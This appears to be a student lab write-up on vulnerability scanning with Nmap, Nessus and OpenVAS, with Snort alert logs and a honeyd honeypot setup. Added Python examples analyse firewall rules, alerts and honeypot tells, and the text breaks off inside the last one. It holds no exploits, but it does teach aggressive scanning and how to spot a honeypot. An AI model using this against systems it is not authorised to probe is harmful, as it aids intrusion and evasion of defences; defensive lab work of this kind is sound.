Penetration Testing : Applications

 

http://www.dis9.com/penetration-testing-applications.html

Installing:

sudo apt-get install nmap nessus openvas-server openvas-client

We could not scan anything while running nmap from the Xen server itself, so we configured a default gateway on the VM:

route add default gw 145.100.105.193

At this moment our system was exposed to the outside, so we added some rules to the iptables firewall. The two ACCEPT rules are appended and the DROP is inserted at position 3, the intention being that only the two listed hosts can reach the VM:

iptables -A INPUT -s 145.100.105.193 -j ACCEPT
iptables -A INPUT -s 145.100.102.131 -j ACCEPT
iptables -I INPUT 3 -j DROP

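Whether these three commands do what is intended depends on what the INPUT chain already contains: the ACCEPT rules are appended to the end, while `-I INPUT 3` inserts the DROP at a fixed position. If the chain already held two rules, the DROP lands in front of the freshly appended ACCEPTs and they can never match. The following Python model of first-match rule evaluation is an added example and not part of the original write-up or of iptables; PAGE_RULES are the three commands above and PREEXISTING is a constructed, hypothetical pair of rules that might already be present.

```python
from ipaddress import ip_address, ip_network

# The three commands from the write-up, in the order they were typed.
PAGE_RULES = [
    "-A INPUT -s 145.100.105.193 -j ACCEPT",
    "-A INPUT -s 145.100.102.131 -j ACCEPT",
    "-I INPUT 3 -j DROP",
]

# Hypothetical rules that might already sit in the INPUT chain before the
# page's commands are run (constructed for this example).
PREEXISTING = [
    "-A INPUT -s 127.0.0.0/8 -j ACCEPT",
    "-A INPUT -s 10.0.0.0/8 -j ACCEPT",
]


def apply_rule(chain, command):
    """Apply one iptables command string to an in-memory chain (a list).

    Supports the subset used on the page: -A <chain> / -I <chain> [pos],
    an optional -s <address|cidr> match and a -j <target>."""
    argv = command.split()
    rule = {"src": None, "target": None}
    pos = None
    i = 0
    while i < len(argv):
        tok = argv[i]
        if tok == "-A":            # append: skip the flag and the chain name
            i += 2
        elif tok == "-I":          # insert: optional 1-based position, default 1
            i += 2
            if i < len(argv) and argv[i].isdigit():
                pos = int(argv[i])
                i += 1
            else:
                pos = 1
        elif tok == "-s":
            rule["src"] = ip_network(argv[i + 1], strict=False)
            i += 2
        elif tok == "-j":
            rule["target"] = argv[i + 1]
            i += 2
        else:
            raise ValueError(f"unsupported token {tok!r}")
    if pos is None:
        chain.append(rule)
    else:
        chain.insert(pos - 1, rule)   # iptables positions are 1-based
    return chain


def build_chain(commands):
    chain = []
    for cmd in commands:
        apply_rule(chain, cmd)
    return chain


def verdict(chain, src, policy="ACCEPT"):
    """First matching rule wins; if nothing matches, the chain policy applies."""
    addr = ip_address(src)
    for rule in chain:
        if rule["src"] is None or addr in rule["src"]:
            return rule["target"]
    return policy


def unreachable_rules(chain):
    """Rules placed after a match-all rule: they can never fire."""
    for idx, rule in enumerate(chain):
        if rule["src"] is None:
            return chain[idx + 1:]
    return []


def describe(chain):
    return [f"{i + 1}: {r['src'] or 'anywhere'} -> {r['target']}"
            for i, r in enumerate(chain)]


if __name__ == "__main__":
    for label, cmds in (("empty chain", PAGE_RULES),
                        ("two pre-existing rules", PREEXISTING + PAGE_RULES)):
        chain = build_chain(cmds)
        print(label)
        print("\n".join(describe(chain)))
        print("  145.100.105.193 ->", verdict(chain, "145.100.105.193"))
        print("  unreachable rules:", len(unreachable_rules(chain)))
```

On an empty chain the result is the intended ACCEPT/ACCEPT/DROP order; with two rules already present the DROP ends up at position 3 ahead of both ACCEPTs, so even the management hosts are dropped. Listing the chain with `iptables -L INPUT --line-numbers` after the change, or appending the DROP with `-A` instead of inserting it at a guessed position, avoids the surprise.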
On our workstation it was now possible to scan for open ports:

sudo nmap 145.100.105.196

Starting Nmap 5.00 ( http://nmap.org ) at 2010-04-01 13:47 CEST
Interesting ports on 145.100.105.196:
Not shown: 997 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
111/tcp open  rpcbind
631/tcp open  ipp

Nmap done: 1 IP address (1 host up) scanned in 13.56 seconds

In the snort log (/var/log/snort/alert) we saw the following entries:

[**] [1:469:3] ICMP PING NMAP [**]
[Classification: Attempted Information Leak] [Priority: 2]
04/01-13:47:31.348379 145.100.102.131 -> 145.100.105.196
ICMP TTL:44 TOS:0x0 ID:31604 IpLen:20 DgmLen:28
Type:8  Code:0  ID:12876   Seq:0  ECHO
[Xref => http://www.whitehats.com/info/IDS162]

[**] [122:1:0] (portscan) TCP Portscan [**]
[Priority: 3]
04/01-13:47:44.360634 145.100.102.131 -> 145.100.105.196
PROTO:255 TTL:0 TOS:0x0 ID:0 IpLen:20 DgmLen:168 DF

[**] [1:1418:11] SNMP request tcp [**]
[Classification: Attempted Information Leak] [Priority: 2]
04/01-13:47:44.396747 145.100.102.131:50051 -> 145.100.105.196:161
TCP TTL:38 TOS:0x0 ID:58065 IpLen:20 DgmLen:44
******S* Seq: 0xF21581F9  Ack: 0x0  Win: 0x1000  TcpLen: 24
TCP Options (1) => MSS: 1460
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088]

[**] [1:1421:11] SNMP AgentX/tcp request [**]
[Classification: Attempted Information Leak] [Priority: 2]
04/01-13:47:44.494539 145.100.102.131:50051 -> 145.100.105.196:705
TCP TTL:37 TOS:0x0 ID:45833 IpLen:20 DgmLen:44
******S* Seq: 0xF21581F9  Ack: 0x0  Win: 0xC00  TcpLen: 24
TCP Options (1) => MSS: 1460
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088]

So snort detected the Nmap portscan.

After installing nessus via aptitude we had to add a nessus user:

/opt/nessus/sbin/nessus-adduser
Login : jeroen
Login password :
Login password (again) :
Do you want this user to be a Nessus 'admin' user ? (can upload plugins, etc...) (y/n) [n]: y
User rules
----------
nessusd has a rules system which allows you to restrict the hosts
that jeroen has the right to test. For instance, you may want
him to be able to scan his own host only.

Please see the nessus-adduser manual for the rules syntax

Enter the rules for this user, and enter a BLANK LINE once you are done :
(the user can have an empty rules set)

Login             : jeroen
Password         : ***********
This user will have 'admin' privileges within the Nessus server
Rules             :
Is that ok ? (y/n) [y] y
User added

The next step is to start nessus:

/etc/init.d/nessusd start

Missing plugins. Attempting a plugin update...
Your installation is missing plugins. Please register and try again.
To register, please visit http://www.nessus.org/register/

We registered on the website given in that message and received a mail with the activation code. We then registered the code with the following command:

/opt/nessus/bin/nessus-fetch --register ****-****-****-****-****

Your activation code has been registered properly - thank you.
Now fetching the newest plugin set from plugins.nessus.org...
Your Nessus installation is now up-to-date.
If auto_update is set to 'yes' in nessusd.conf, Nessus will
update the plugins by itself.

After this process I tried to start nessus again:

/etc/init.d/nessusd start

No errors were given, so we could start the scan:

/opt/nessus/bin/nessuscmd 145.100.105.196

Starting nessuscmd 4.2.1
Scanning '145.100.105.196'...

+ Results found on 145.100.105.196 :
   - Port ssh (22/tcp) is open
   - Port sunrpc (111/tcp) is open
   - Port ipp (631/tcp) is open
   - Port postgresql (5432/tcp) is open

We got the following records in the snort log:

[**] [122:17:0] (portscan) UDP Portscan [**]
[Priority: 3]
04/01-14:31:15.612342 145.100.96.11 -> 145.100.104.21
PROTO:255 TTL:0 TOS:0xC0 ID:34166 IpLen:20 DgmLen:166

[**] [122:3:0] (portscan) TCP Portsweep [**]
[Priority: 3]
04/01-14:31:27.040300 145.100.102.131 -> 145.100.105.196
PROTO:255 TTL:0 TOS:0x0 ID:0 IpLen:20 DgmLen:168 DF

[**] [122:1:0] (portscan) TCP Portscan [**]
[Priority: 3]
04/01-14:31:27.040300 145.100.102.131 -> 145.100.105.196
PROTO:255 TTL:0 TOS:0x0 ID:0 IpLen:20 DgmLen:167 DF

[**] [1:1418:11] SNMP request tcp [**]
[Classification: Attempted Information Leak] [Priority: 2]
04/01-14:31:32.044917 145.100.102.131:56958 -> 145.100.105.196:161
TCP TTL:63 TOS:0x4 ID:43162 IpLen:20 DgmLen:60 DF
******S* Seq: 0x7AEF1E8D  Ack: 0x0  Win: 0x16D0  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 4044311 0 NOP WS: 6
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088]

[**] [1:1420:11] SNMP trap tcp [**]
[Classification: Attempted Information Leak] [Priority: 2]
04/01-14:31:37.378486 145.100.102.131:35607 -> 145.100.105.196:162
TCP TTL:63 TOS:0x4 ID:14118 IpLen:20 DgmLen:60 DF
******S* Seq: 0x7F2B8C6A  Ack: 0x0  Win: 0x16D0  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 4045644 0 NOP WS: 6
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088]

[**] [1:1421:11] SNMP AgentX/tcp request [**]
[Classification: Attempted Information Leak] [Priority: 2]
04/01-14:31:37.455136 145.100.102.131:51747 -> 145.100.105.196:705
TCP TTL:63 TOS:0x4 ID:50450 IpLen:20 DgmLen:60 DF
******S* Seq: 0x7F3E7E72  Ack: 0x0  Win: 0x16D0  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 4045664 0 NOP WS: 6
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088]

[**] [1:249:8] DDOS mstream client to handler [**]
[Classification: Attempted Denial of Service] [Priority: 2]
04/01-14:31:40.803471 145.100.102.131:34168 -> 145.100.105.196:15104
TCP TTL:63 TOS:0x4 ID:53980 IpLen:20 DgmLen:60 DF
******S* Seq: 0x82C26C79  Ack: 0x0  Win: 0x16D0  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 4046501 0 NOP WS: 6
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-0138][Xref => http://www.whitehats.com/info/IDS111]

[**] [122:1:0] (portscan) TCP Portscan [**]
[Priority: 3]
04/01-14:31:44.216729 145.100.102.131 -> 145.100.105.196
PROTO:255 TTL:0 TOS:0x4 ID:0 IpLen:20 DgmLen:168 DF

[**] [1:1421:11] SNMP AgentX/tcp request [**]
[Classification: Attempted Information Leak] [Priority: 2]
04/01-14:31:47.298076 145.100.102.131:55336 -> 145.100.105.196:705
TCP TTL:63 TOS:0x4 ID:49082 IpLen:20 DgmLen:60 DF
******S* Seq: 0x88EF7B46  Ack: 0x0  Win: 0x16D0  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 4048124 0 NOP WS: 6
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088]

[**] [1:1420:11] SNMP trap tcp [**]
[Classification: Attempted Information Leak] [Priority: 2]
04/01-14:31:47.750283 145.100.102.131:40739 -> 145.100.105.196:162
TCP TTL:63 TOS:0x4 ID:10439 IpLen:20 DgmLen:60 DF
******S* Seq: 0x8907EDAA  Ack: 0x0  Win: 0x16D0  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 4048237 0 NOP WS: 6
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088]

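Both Snort logs above (the one from the nmap scan and this one from the Nessus scan) show the same shape: a burst of alerts from one source, the scanning workstation 145.100.102.131, that mixes sfPortscan preprocessor events (generator ID 122) with signature hits such as the SNMP and mstream rules, next to an unrelated UDP portscan from another host. The Python summariser below is an added example and not part of the original write-up or of Snort: it parses the "full" alert format shown on the page into records and groups them per source address, so a reviewer can see at a glance which source is scanning and which ports it touched. The sample input is constructed from records copied from the page's two logs, with the long [Xref] lines removed.

```python
import re
from collections import defaultdict

# Constructed sample: records copied from the two Snort alert logs on the
# page, with the long [Xref => ...] lines dropped for brevity.
SAMPLE_ALERTS = """\
[**] [1:469:3] ICMP PING NMAP [**]
[Classification: Attempted Information Leak] [Priority: 2]
04/01-13:47:31.348379 145.100.102.131 -> 145.100.105.196
ICMP TTL:44 TOS:0x0 ID:31604 IpLen:20 DgmLen:28

[**] [122:1:0] (portscan) TCP Portscan [**]
[Priority: 3]
04/01-13:47:44.360634 145.100.102.131 -> 145.100.105.196
PROTO:255 TTL:0 TOS:0x0 ID:0 IpLen:20 DgmLen:168 DF

[**] [1:1418:11] SNMP request tcp [**]
[Classification: Attempted Information Leak] [Priority: 2]
04/01-13:47:44.396747 145.100.102.131:50051 -> 145.100.105.196:161
TCP TTL:38 TOS:0x0 ID:58065 IpLen:20 DgmLen:44

[**] [122:17:0] (portscan) UDP Portscan [**]
[Priority: 3]
04/01-14:31:15.612342 145.100.96.11 -> 145.100.104.21
PROTO:255 TTL:0 TOS:0xC0 ID:34166 IpLen:20 DgmLen:166

[**] [1:1421:11] SNMP AgentX/tcp request [**]
[Classification: Attempted Information Leak] [Priority: 2]
04/01-14:31:37.455136 145.100.102.131:51747 -> 145.100.105.196:705
TCP TTL:63 TOS:0x4 ID:50450 IpLen:20 DgmLen:60 DF

[**] [1:249:8] DDOS mstream client to handler [**]
[Classification: Attempted Denial of Service] [Priority: 2]
04/01-14:31:40.803471 145.100.102.131:34168 -> 145.100.105.196:15104
TCP TTL:63 TOS:0x4 ID:53980 IpLen:20 DgmLen:60 DF
"""

HEADER = re.compile(r"^\[\*\*\] \[(\d+):(\d+):(\d+)\] (.+?) \[\*\*\]$")
PRIORITY = re.compile(r"\[Priority: (\d+)\]")
CLASSIFICATION = re.compile(r"\[Classification: ([^\]]+)\]")
# MM/DD-HH:MM:SS.usec src[:port] -> dst[:port]
PACKET = re.compile(
    r"^(\d\d/\d\d-\d\d:\d\d:\d\d\.\d+) (\S+?)(?::(\d+))? -> (\S+?)(?::(\d+))?$")
PORTSCAN_GID = 122   # generator ID of Snort's sfPortscan preprocessor


def parse_alerts(text):
    """Parse blank-line separated Snort 'full' alert records into dicts."""
    alerts = []
    for block in re.split(r"\n\s*\n", text.strip()):
        lines = block.splitlines()
        head = HEADER.match(lines[0]) if lines else None
        if head is None:
            continue                       # not an alert record
        alert = {"gid": int(head.group(1)), "sid": int(head.group(2)),
                 "msg": head.group(4), "classification": None, "priority": None,
                 "timestamp": None, "src": None, "src_port": None,
                 "dst": None, "dst_port": None}
        for line in lines[1:]:
            m = PRIORITY.search(line)
            if m:
                alert["priority"] = int(m.group(1))
            m = CLASSIFICATION.search(line)
            if m:
                alert["classification"] = m.group(1)
            m = PACKET.match(line)
            if m:
                alert["timestamp"] = m.group(1)
                alert["src"], alert["dst"] = m.group(2), m.group(4)
                alert["src_port"] = int(m.group(3)) if m.group(3) else None
                alert["dst_port"] = int(m.group(5)) if m.group(5) else None
        if alert["src"] is not None:       # skip records without a packet line
            alerts.append(alert)
    return alerts


def summarize(alerts):
    """Group alerts per source address. Timestamps are compared as strings,
    which orders correctly within the single year a Snort log spans."""
    summary = defaultdict(lambda: {"alerts": 0, "signatures": set(),
                                   "dst_ports": set(), "top_priority": None,
                                   "portscan": False, "first": None, "last": None})
    for a in alerts:
        s = summary[a["src"]]
        s["alerts"] += 1
        s["signatures"].add(a["msg"])
        if a["dst_port"] is not None:
            s["dst_ports"].add(a["dst_port"])
        if a["priority"] is not None and (s["top_priority"] is None
                                          or a["priority"] < s["top_priority"]):
            s["top_priority"] = a["priority"]   # priority 1 is the most severe
        if a["gid"] == PORTSCAN_GID:
            s["portscan"] = True
        s["first"] = min(t for t in (s["first"], a["timestamp"]) if t)
        s["last"] = max(t for t in (s["last"], a["timestamp"]) if t)
    return dict(summary)


def report(summary):
    lines = []
    for src, s in sorted(summary.items(), key=lambda kv: -kv[1]["alerts"]):
        tag = "portscan" if s["portscan"] else "signature only"
        lines.append(f"{src:16} {s['alerts']:3} alerts  top_prio={s['top_priority']}  "
                     f"ports={sorted(s['dst_ports'])}  {tag}  {s['first']}..{s['last']}")
    return lines


if __name__ == "__main__":
    print("\n".join(report(summarize(parse_alerts(SAMPLE_ALERTS)))))
```

Run against the real /var/log/snort/alert the same grouping separates the scanning host (many signatures, portscan events, a spread of destination ports in a short window) from a one-off hit, which is the question an analyst asks first when the log fills up during a scan.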
Installing OpenVAS was a bit more complicated. Installing from the repository was not possible because of an error in the package, so we installed it from source. We took the newest version and tried to install it:

wget http://wald.intevation.org/frs/download.php/724/openvas-scanner-3.0.2.tar.gz
tar -zxvf openvas-scanner-3.0.2.tar.gz   # extract and enter the source tree (implied, not listed in the original)
cd openvas-scanner-3.0.2
./configure

This resulted in an error. It had a few dependencies and needed the OpenVAS libraries, so I downloaded these:

wget http://wald.intevation.org/frs/download.php/717/openvas-libraries-3.0.4.tar.gz
tar -zxvf openvas-libraries-3.0.4.tar.gz   # extract and enter the source tree (implied, not listed in the original)
cd openvas-libraries-3.0.4
./configure
configure: error: "glib >= 2.12.0 not found"

Another dependency… I searched for packages in the repository that included glib:

apt-file search glib

The glib packages in the repository were at most version 2.7, so we decided to install a slightly older OpenVAS version instead. We had a lot of help from this website: http://wikisecure.net/security/how-to-install-openvas-ubuntu9

First we made some preparations:

sudo apt-get update
sudo apt-get install build-essential libgtk2.0-dev libglib2.0-dev libssl-dev htmldoc libgnutls-dev libpcap0.8-dev bison libgpgme11-dev libsmbclient-dev snmp pnscan
sudo updatedb
sudo ldconfig
cd /home/user/Desktop
mkdir OpenVAS
cd OpenVAS

After this we downloaded the openVAS libraries, scanner and client and extracted them:

wget -c http://wald.intevation.org/frs/download.php/683/openvas-libraries-3.0.0.tar.gz
wget -c http://wald.intevation.org/frs/download.php/684/openvas-scanner-3.0.0.tar.gz
wget -c http://wald.intevation.org/frs/download.php/685/openvas-client-3.0.0.tar.gz
sudo tar -zxvf openvas-libraries-3.0.0.tar.gz
sudo tar -zxvf openvas-scanner-3.0.0.tar.gz
sudo tar -zxvf openvas-client-3.0.0.tar.gz

Installing OpenVAS Libraries:

cd openvas-libraries-3.0.0
sudo ./configure
sudo apt-get install cmake
sudo make
sudo make install
sudo ldconfig

Installing OpenVAS Scanner daemons:

cd ../openvas-scanner-3.0.0   # directory name as produced by the tarball above
sudo ./configure
sudo make
sudo make install

Installing OpenVAS Client GUI:

cd ../openvas-client-3.0.0
sudo ./configure
sudo make
sudo make install
sudo updatedb
sudo ldconfig

Next, we generated a certificate:

sudo openvas-mkcert
-------------------------------------------------------------------------------
            Creation of the OpenVAS SSL Certificate
-------------------------------------------------------------------------------

This script will now ask you the relevant information to create the SSL certificate of OpenVAS.
Note that this information will *NOT* be sent to anybody (everything stays local), but anyone with the ability to connect to your OpenVAS daemon will be able to retrieve this information.

CA certificate life time in days [1460]:
Server certificate life time in days [365]:
Your country (two letter code) [US]: NL
Your state or province name [none]: Noord-Holland
Your location (e.g. town) [Berlin]: Amsterdam
Your organization [OpenVAS Users United]:

-------------------------------------------------------------------------------
            Creation of the OpenVAS SSL Certificate
-------------------------------------------------------------------------------

Congratulations. Your server certificate was properly created.

/usr/local/etc/openvas/openvassd.conf updated
The following files were created:

. Certification authority:
   Certificate = /usr/local/var/lib/openvas/CA/cacert.pem
   Private key = /usr/local/var/lib/openvas/private/CA/cakey.pem

. OpenVAS Server :
    Certificate = /usr/local/var/lib/openvas/CA/servercert.pem
    Private key = /usr/local/var/lib/openvas/private/CA/serverkey.pem

Press [ENTER] to exit

Finally we added an OpenVAS user:

sudo openvas-adduser
Create user account for OpenVAS Client. [It will be used to login to OpenVAS Client]

Using /var/tmp as a temporary file holder.

Add a new openvassd user
---------------------------------

Login : jeroen
Authentication (pass/cert) [pass] :
Login password :
Login password (again) :

User rules
---------------
openvassd has a rules system which allows you to restrict the hosts that jeroen has the right to test.
For instance, you may want him to be able to scan his own host only.

Please see the openvas-adduser(8) man page for the rules syntax.

Enter the rules for this user, and hit ctrl-D once you are done:
(the user can have an empty rules set)

Login             : jeroen
Password          : ***********

Rules             :

Is that ok? (y/n) [y]

user added.

Next we updated the OpenVAS plugins folder (/usr/local/lib/openvas/plugins) with the latest set of plugins:

sudo openvas-nvt-sync

Start openVAS:

sudo openvassd

After this you put the IP address, or a list of IP addresses, of the host(s) you want to scan in a text file:

echo "145.100.105.196" >> iptoscan.txt

To scan the IP addresses we executed the following command:

OpenVAS-Client -q 127.0.0.1 9390 jeroen ******** iptoscan.txt scanresults.html -T html
Please choose your level of SSL paranoia (Hint: if you want to manage
many servers from your client, choose 2. Otherwise, choose 1. Or 3,
if you are paranoid.
2
*** Warning: paranoia_level=2 but "trusted_ca" file not found:
cacert.pem
*** Info: Found and enabled 16709 new plugins.

The output of the scan is saved in scanresults.html. Note the warning in the output above: at SSL paranoia level 2 the client checks the scanner's certificate against a trusted CA file, and it could not find the cacert.pem generated by openvas-mkcert, so for this run it had no CA to verify the scanner's certificate against.

  • Honey pots:
    • Set up a honey pot of choice (e.g. honeyd) in a VM (new or existing VM, your choice).
      • Configure it to act like a vulnerable system.
      • Run at least three services.

We used the following configuration file to create a VM for the honeypot:

import os, re
arch = os.uname()[4]
if re.search('64', arch):
    arch_libdir = 'lib64'
else:
    arch_libdir = 'lib'

# fully virtualised (HVM) guest, booted through hvmloader
kernel = "/usr/lib/xen/boot/hvmloader"
builder='hvm'

memory = 256
name = "ubuntu-desktop"
dhcp = "dhcp"
# bridged onto eth2; this MAC reappears in the farpd and honeyd capture filters later on
vif = [ 'bridge=eth2, mac=00:16:3e:59:34:7d' ]
# hda is the disk image created below, hdc the Ubuntu installation ISO
disk = [ 'file:/home/jeroen/ids/disk1.img,hda,w', 'file:/home/jeroen/inr/isos/ubuntu-9.10-desktop-i386.iso,hdc:cdrom,r' ]
#disk = [ 'file:/home/jeroen/inr/hvm/ubuntu9.10.img,hda,w', ]
device_model = '/usr/' + arch_libdir + '/xen/bin/qemu-dm'
stdvga=0
sdl=0
vnc=1
vncviewer=1
boot = 'cd'      # boot order: c (hard disk) then d (CD-ROM)
serial='pty'

We created an image of 3GB:

dd if=/dev/zero of=disk1.img bs=1 count=0 seek=3G   # seek is counted in output blocks, so bs=1 is needed for 3G to mean 3 GB; this creates a sparse file

And created the VM:

xm create xenhoney.cfg

Then we installed honeyd:

sudo apt-get install honeyd

First of all, honeyd must answer ARP requests destined for the virtual hosts it creates. We use farpd for this, which is already installed by default on Ubuntu. For this we modified /etc/default/farpd:

INTERFACE="eth0"
NETWORK="145.100.105.192/27"

This means that farpd listens on interface eth0 for incoming ARP requests and answers those for addresses in the network 145.100.105.192/27. After this step the daemon needs to be restarted:

/etc/init.d/farpd restart
* Restarting Fake-arpd daemon farpd
arpd[30280]: listening on eth0: arp and (dst net 145.100.105.192/27) and not ether src 00:16:3e:59:34:7d
                                                                         [ OK ]

Next, we had to modify the honeyd config file:

RUN="yes"
INTERFACE="eth0"
NETWORK=145.100.105.196

Then we can start the daemon:

/etc/init.d/honeyd start
 * Starting Honeyd daemon honeyd                                         [ OK ]

The next thing to do is to create a fake system:

vim /etc/honeypot/myfakemachine.conf

create windows
set windows personality "Microsoft Windows XP Professional"
add windows tcp port 80 "sh scripts/web.sh"
add windows tcp port 25 "perl scripts/snmp/fake-snmp.pl"
add windows tcp port 23 "perl scripts/telnet/faketelnet.pl"
add windows tcp port 139 open
add windows tcp port 137 open
add windows udp port 137 open
add windows udp port 135 open
set windows default tcp action reset
set windows default udp action reset
bind 145.100.105.197 windows

When I tried to start the fake system, I got the following error:

sudo honeyd -f /etc/honeypot/myfakemachine.conf 145.100.105.197

Honeyd V1.5c Copyright (c) 2002-2007 Niels Provos
honeyd[30337]: started with -f /etc/honeypot/myfakemachine.conf 145.100.105.197
honeyd[30337]: listening promiscuously on eth0: (arp or ip proto 47 or (udp and src port 67 and dst port 68) or (ip )) and not ether src 00:16:3e:59:34:7d
/etc/honeypot/honeyd.conf:2: Unknown personality "Windows NT 4.0 Server SP5-SP6"
honeyd: parsing configuration file failed

The error points at line 2 of /etc/honeypot/honeyd.conf, the distribution's default configuration: the personality string used there, "Windows NT 4.0 Server SP5-SP6", is not present in the Nmap fingerprint file (nmap.prints) that honeyd validates personalities against, so parsing fails. I changed the personality to a name that does exist, "Microsoft Windows XP Professional" (the config above already shows this). This solved the problem:

sudo honeyd -f /etc/honeypot/myfakemachine.conf 145.100.105.197

Honeyd V1.5c Copyright (c) 2002-2007 Niels Provos
honeyd[30343]: started with -f /etc/honeypot/myfakemachine.conf 145.100.105.197
honeyd[30343]: listening promiscuously on eth0: (arp or ip proto 47 or (udp and src port 67 and dst port 68) or (ip )) and not ether src 00:16:3e:59:34:7d
Honeyd starting as background process

We tried to ping the machine:

ping 145.100.105.197
PING 145.100.105.197 (145.100.105.197) 56(84) bytes of data.
From 145.100.105.196 icmp_seq=1 Destination Host Unreachable
From 145.100.105.196 icmp_seq=2 Destination Host Unreachable
From 145.100.105.196 icmp_seq=3 Destination Host Unreachable

This was not much of a success. We restarted everything and double-checked all configurations. In the end I tried to ping from another system than my HVM, and that worked just fine. The reason is visible in honeyd's own startup line: its capture filter ends in "and not ether src 00:16:3e:59:34:7d", so honeyd deliberately ignores every frame sent by the host it runs on. The host's own ARP request for 145.100.105.197 is therefore never answered, and the local kernel reports "Destination Host Unreachable" from 145.100.105.196. A honeyd honeypot has to be tested from a different machine on the segment.

  • Scan it with Nmap including version detection.
    • Does nmap think that it’s a real device?

To scan for open ports with nmap, we used the following command:

nmap -A -T4 145.100.105.197

Starting Nmap 5.00 ( http://nmap.org ) at 2010-04-12 13:08 CEST
Interesting ports on 145.100.105.197:
Not shown: 996 closed ports
PORT    STATE SERVICE      VERSION
23/tcp  open  tcpwrapped
25/tcp  open  tcpwrapped
80/tcp  open  tcpwrapped
139/tcp open  netbios-ssn?
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=5.00%D=4/12%OT=23%CT=1%CU=33139%PV=N%DS=2%G=Y%TM=4BC2FFD4%P=i686-
OS:pc-linux-gnu)SEQ(SP=A0%GCD=1%ISR=A8%TI=I%CI=I%II=I%SS=S%TS=U)OPS(O1=M5B4
OS:NW0%O2=M5B4NW0%O3=M5B4NW0%O4=M5B4NW0%O5=M5B4NW0%O6=M5B4NW0)WIN(W1=F424%W
OS:2=F424%W3=F424%W4=F424%W5=F424%W6=F424)ECN(R=Y%DF=Y%T=40%W=F424%O=M5B4NW
OS:0%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=N%T=40%W=0%S=
OS:A%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=40%W=F424%S=O%A=S+%F=AS%O=M5B4NW0%RD
OS:=0%Q=)T3(R=Y%DF=Y%T=40%W=F424%S=O%A=O%F=AS%O=M5B4NW0%RD=0%Q=)T4(R=Y%DF=N
OS:%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T=40%W=0%S=A%A=S+%F=AR%O=%R
OS:D=0%Q=)T6(R=Y%DF=N%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=N%T=40%W=0%
OS:S=A%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=38%UN=0%RIPL=G%RID=G%RIPCK
OS:=G%RUCK=G%RUD=G)IE(R=Y%DFI=Y%T=80%CD=Z)

Network Distance: 2 hops

Host script results:
|_ nbstat: ERROR: Name query failed: TIMEOUT

TRACEROUTE (using port 587/tcp)
HOP RTT  ADDRESS
1   1.42 router.students.os3.nl (145.100.102.129)
2   0.23 spearow.studlab.os3.nl (145.100.104.21)
3   0.90 145.100.105.197

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 186.52 seconds

  • -A: enables OS detection, version detection, script scanning (the nbstat result above) and traceroute
  • -T4: the "aggressive" timing template, for faster execution

An attacker could suspect that this is a fake device. Nmap finds no OS match (honeyd 1.5c imitates first-generation Nmap fingerprints, while Nmap 5.00 uses its second-generation OS detection, so the emulated Windows XP stack is not recognised), and all three scripted services come back as "tcpwrapped": the TCP handshake completed, but the service closed the connection without sending anything a version probe could match. A real Windows host with telnet, SMTP and HTTP exposed would normally show banners and version strings.
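Those two signals can be checked mechanically. The following Python is an added example (not part of the original write-up and not an Nmap feature): it parses the port table and the OS line of Nmap's normal output and lists the honeypot tells, using the scan result above as its sample input. The 50% tcpwrapped threshold is an assumption.

```python
"""Score an Nmap normal-output report for honeypot tells.

Added example, not part of the original write-up. It parses the port table
and OS-detection line of `nmap -A` normal output and flags the signals seen
above: open ports reported as "tcpwrapped" (handshake completes, service
sends nothing and closes), services that Nmap could only guess from the
port number (trailing "?"), and the absence of an OS match.
"""
import re

# Sample input: the port table and OS lines from the scan of 145.100.105.197
# above, reproduced here as test data.
SAMPLE_REPORT = """\
Interesting ports on 145.100.105.197:
Not shown: 996 closed ports
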